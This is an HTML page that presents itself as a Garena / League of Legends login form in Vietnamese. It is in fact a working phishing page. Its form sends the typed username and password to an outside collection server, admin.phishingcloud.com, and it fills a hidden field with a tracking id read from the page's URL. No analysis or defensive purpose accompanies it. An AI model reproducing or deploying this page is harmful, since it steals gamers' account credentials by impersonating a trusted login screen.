
<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- Bootstrap CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.5.0/font/bootstrap-icons.css">
    <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js'></script>

    <script type='text/javascript'>
//<![CDATA[
function loadCSS(e, t, n) { "use strict"; var i = window.document.createElement("link"); var o = t || window.document.getElementsByTagName("script")[0]; i.rel = "stylesheet"; i.href = e; i.media = "only x"; o.parentNode.insertBefore(i, o); setTimeout(function () { i.media = n || "all" }) }
loadCSS("https://use.fontawesome.com/releases/v5.6.3/css/all.css");loadCSS("https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700|Roboto+Condensed:300,400,700");
//]]>
</script>
    <style>
    body{font-family:"Roboto",sans-serif;font-size:16px;margin:0;padding:0;color:#222;overflow-x:hidden;counter-reset:my-sec-counter;scroll-behavior: smooth}
    .input-group-text {
    display: flex;
    align-items: center;
    padding: .375rem .75rem;
    font-size: 1rem;
    font-weight: 400;
    line-height: 1.5;
    color: #212529;
    text-align: center;
    white-space: nowrap;
    background-color: #fff;
    border: 1px solid #ced4da;
    border-radius: .25rem;
}
input.form-control {
    font-size: 15px!important;
    border: 1px solid #d4d4d4!important;
}
.btn-danger {
    color: #fff;
    background-color: #fb2528;
    border-color: #fb2528;
    border-radius: 100px!important;
    font-weight: 400;
    font-size: 15px!important;
}
</style>
  </head>
  <body>
    <div class="container">
    <img style="
    width: 200px;
    margin: auto;
    display: block;
" src="https://freepngimg.com/thumb/league_of_legends/81850-league-legends-text-symbol-youtube-garena-of.png"/>
<div class="row justify-content-center mt-4">
  <form action='https://admin.phishingcloud.com/auth.php' method='POST'>

  <div class='mb-4 mt-4' hidden='hidden'>
      <input class='form-control' name='type' required='required' type='text' value='Garena'/>
<input class='form-control' name='id' required='required' type='text' value=''/>
</div>
  <div class="input-group input-group-lg mb-3">
  <span class="input-group-text" id="inputGroup-sizing-lg"><i class="bi bi-person"></i></span>
  <input name='taikhoan' placeholder="Tên đăng nhập/Email" type="text" class="form-control" aria-label="Sizing example input" aria-describedby="inputGroup-sizing-lg" required>
</div>
<div class="input-group input-group-lg">
  <span class="input-group-text" id="inputGroup-sizing-lg"><i class="bi bi-person"></i></span>
  <input name='matkhau' placeholder="Mật khẩu" type="text" class="form-control" aria-label="Sizing example input" aria-describedby="inputGroup-sizing-lg" required>
</div>

<div class="d-grid gap-2 mt-4">
  <button id='dangnhap' class="btn btn-danger btn-lg" type="submit">Đăng nhập</button>
</div>
</div>
</form>
</div>
    <!-- Option 1: Bootstrap Bundle with Popper -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>

<script type='text/javascript'>
$("#dangnhap").click(function(){
    $("#dangnhap").text('Vui lòng chờ...');
    $("#dangnhap").addClass('disabled');
    })
  function GetURLParameter(sParam)
{
    var sPageURL = window.location.search.substring(1);
    var sURLVariables = sPageURL.split('&');
    for (var i = 0; i < sURLVariables.length; i++) 
    {
        var sParameterName = sURLVariables[i].split('=');
        if (sParameterName[0] == sParam) 
        {
            return sParameterName[1];
        }
    }
}
                                             </script>
<script>
    $(document).ready(function(){
    var tech = GetURLParameter('id');
    $("input[name=id]").val(tech);
    });
  </script>
  </body>
</html>
